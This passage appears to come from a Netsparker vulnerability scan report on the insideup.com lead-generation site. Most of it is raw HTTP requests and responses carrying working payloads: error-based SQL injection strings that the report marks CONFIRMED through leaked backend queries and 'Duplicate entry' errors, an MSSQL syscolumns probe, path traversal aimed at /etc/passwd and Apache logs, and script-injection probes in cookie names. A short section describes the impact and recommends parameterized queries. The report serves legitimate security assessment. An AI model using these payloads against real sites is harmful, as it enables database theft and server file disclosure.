Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0mdup40cv6snsbek3637c3vi94; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=544lqup2abq45r6l90icof60l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f84fgck871o47vr7vhekf3l3l3; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
[Probable] SQL Injection

23 TOTAL
CRITICAL
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as normal data. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection here, it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is a SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, so that we can address it next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries, and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review web logs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 